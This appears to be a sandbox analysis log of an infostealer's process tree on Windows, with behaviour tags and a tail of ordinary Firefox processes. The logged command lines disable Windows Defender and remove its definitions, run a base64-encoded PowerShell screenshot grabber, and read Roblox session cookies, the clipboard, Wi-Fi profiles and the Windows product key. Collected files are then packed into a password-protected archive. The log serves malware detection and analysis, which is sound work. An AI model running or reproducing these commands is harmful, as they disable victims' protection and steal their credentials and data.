C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XyloTool.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:752 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:624 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1184 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2800 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:4928
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c5hhtixo\c5hhtixo.cmdline"5⤵PID:4428
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES48B1.tmp" "c:\Users\Admin\AppData\Local\Temp\c5hhtixo\CSCD6BDBEF5704E4AB0A8A12B1D19DBE296.TMP"6⤵PID:4724
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1740
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1196
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1648
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:1760
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:976
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4180
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:2284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:452
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:2168
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\16ZAa.zip" *"3⤵PID:3596
-
C:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI50922\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\16ZAa.zip" *4⤵
- Executes dropped EXE
PID:2028 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:3200
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:4836
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:804
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:2492
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:212
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2236
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1712 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4888
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3236 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:2284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1656
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:3004
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4044 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.0.1548542661\2139289314" -parentBuildID 20230214051806 -prefsHandle 1744 -prefMapHandle 1736 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8c4450c-f290-4eb3-a480-ab5f6ba382d5} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 1836 2feca6f1858 gpu3⤵PID:1020
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.1.615803478\657450740" -parentBuildID 20230214051806 -prefsHandle 2392 -prefMapHandle 2380 -prefsLen 22112 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b67ab8a7-2fac-49df-8dae-1f0fde550550} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 2404 2febe989958 socket3⤵PID:3060
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.2.1644332059\1435831737" -childID 1 -isForBrowser -prefsHandle 2940 -prefMapHandle 2888 -prefsLen 22150 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bfed46cf-57bb-4606-a776-fa4d12b76d70} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 2928 2fece417758 tab3⤵PID:3652
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.3.1230308447\1780318342" -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d76516e-e026-47c4-be18-94165c9e9f14} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 3680 2fed019e158 tab3⤵PID:1768
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.4.1356212022\1164133433" -childID 3 -isForBrowser -prefsHandle 5168 -prefMapHandle 5164 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97da2b5c-4347-42bd-86f1-507ad3b160be} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5180 2fed233fe58 tab3⤵PID:1228
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.5.1394154044\1857127210" -childID 4 -isForBrowser -prefsHandle 5312 -prefMapHandle 5316 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b07befdf-24f4-4534-b741-b5acbd6c7c44} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5304 2fed2e70a58 tab3⤵PID:4352
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.6.827780039\676138984" -childID 5 -isForBrowser -prefsHandle 5508 -prefMapHandle 5512 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9448d54-d316-4272-918f-3172d1a0cbac} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5496 2fed2e71c58 tab3⤵PID:2448
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.7.191482268\258674567" -childID 6 -isForBrowser -prefsHandle 1536 -prefMapHandle 2636 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95b72987-d9d9-418a-8620-e8eb7046e258} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5792 2fed407f558 tab3⤵PID:1764
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.8.1684474144\338674860" -parentBuildID 20230214051806 -prefsHandle 6064 -prefMapHandle 1564 -prefsLen 27697 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a248d000-0d31-40c3-8ec7-ee6170945729} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 5988 2fed02d7058 rdd3⤵PID:4808
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.9.1102547069\110656528" -childID 7 -isForBrowser -prefsHandle 10040 -prefMapHandle 10044 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54dbb319-ef2d-4289-9737-a85292bc8889} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 10080 2fed4efa258 tab3⤵PID:1472
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.10.1677778235\723996722" -childID 8 -isForBrowser -prefsHandle 9800 -prefMapHandle 9768 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69969fe8-05c9-4a79-8d78-bb3414f02c73} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9808 2fed407fe58 tab3⤵PID:5376
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4044.11.1775630829\2101987883" -childID 9 -isForBrowser -prefsHandle 9580 -prefMapHandle 9568 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1300 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {75b43ce5-ac76-432e-b0db-4f69a799903b} 4044 "\\.\pipe\gecko-crash-server-pipe.4044" 9588 2fed5549858 tab3⤵PID:5672
-
